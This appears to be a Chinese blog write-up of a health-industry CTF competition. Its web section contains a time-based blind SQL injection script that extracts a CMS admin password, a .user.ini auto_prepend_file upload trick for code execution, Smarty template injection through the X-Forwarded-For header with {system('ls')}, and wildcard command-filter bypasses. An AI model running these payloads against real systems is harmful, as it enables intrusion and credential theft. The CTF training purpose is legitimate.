Ca1s1'Blog

卫生健康行业CTF

ctf
字数统计: 548阅读时长: 2 min
2021/07/13 Share

卫生健康行业CTF

web

easy_cms

下载源码本地搭建环境,最下方cms名字叫闪灵

搜索相关cms漏洞,发现前台存在一个sql延迟注入,构造poc
1/**/AND/**/(if(ascii(substr((select/**/A_pwd/**/from/**/SL_admin/**/limit/**/0,1),1,1))<>50,1,sleep(3)))=xxx

编写python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#coding:utf-8
#Author:Ca1s1
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
flag = ''
#global flag

for i in range(1,33):
    for char in chars:
        charAscii = ord(char)
        url = "http://vuln/function/form.php?action=input"
        data = {'1/**/AND/**/(if(ascii(substr((select/**/A_pwd/**/from/**/SL_admin/**/limit/**/0,1),%s,1))<>%s,1,sleep(3)))'%(i,charAscii):"xxxx"}
        #urlformat = data.format(i,charAscii)
        start_time = time.time()
        rsp = requests.post(url=url,data=data,headers=headers)
        #print(data)
        if  time.time() - start_time > 2.5:
            flag+=char
            #print(flag)
            print('flag:',flag)
            break
        else:
            pass
print('flag is ' + flag)

获得账号密码后登陆后台,允许上传格式添加一个ini

在后台管理处上传文件

上传一个.user.ini文件,文件内容为

1
auto_prepend_file=test.jpg

在上传一个test.jpg,内容为phpinfo
访问index.php,即可代码执行

Super_hacker

根据提示
Via 头需要有值;X-Forwarded-For 存在smarty的模板注入
添加Via头和X-Forwarded-For:
通过{system('ls')}执行命令

但是空格和i都被过滤了需要绕过,通过$smarty.get.jan将输入点变为get请求从而绕过(还有一个办法通过\t绕过空格从而命令执行)

easy_web1

查看源代码,发现There_is_no_flag_here.php

只允许本地访问

添加http头部,获得flag

Easy_web1

网上的一道原题
通过/???/????64%20/????.???
通过匹配单个字符,使用base64命令进行绕过

通过burpsuite的decode,base64解码

Misc

BASE64编码

1
R1kzRE1RWldHRTNET04yQ0dZWkRNTUpYR00zREtNWldHTTJES1JSVEdNWlRFTktHR01ZVEdOUlZJWTNES05SUkc0WlRPT0pWSVkzREVOUlJHNFpUTU5KWElRPT09PT09

Base64 -> base32 -> 16进制
base64 decode

base32 decode

16进制转换

医学影像

打开文件发现一堆以.dcm后缀结尾的文件(这是啥呀)


经过百度之后得知这是那啥CT的片子。下载Sante DICOM Editor,dicom文件查看器

http://www.downxia.com/downinfo/30150.html

导入题目文件**



选择页面下方的MPR**

可自行调整颜色,使缺失部分的黑线更加明显**

拖动定位标至黑线出(慢慢找) 得到flag

flag{You_find_it}

原文作者:Fidcer

原文链接:https://vuln.top/2021/07/13/16261510553094/

发表日期:July 13th 2021, 2:09:08 pm

更新日期:July 13th 2021, 2:09:08 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 卫生健康行业CTF
    1. 1.1. web
      1. 1.1.1. easy_cms
      2. 1.1.2. Super_hacker
      3. 1.1.3. easy_web1
      4. 1.1.4. Easy_web1
    2. 1.2. Misc
      1. 1.2.1. BASE64编码
      2. 1.2.2. 医学影像
Total : 41
2021
2020
2019
Invalid date
2020
2019
ctf burpsuite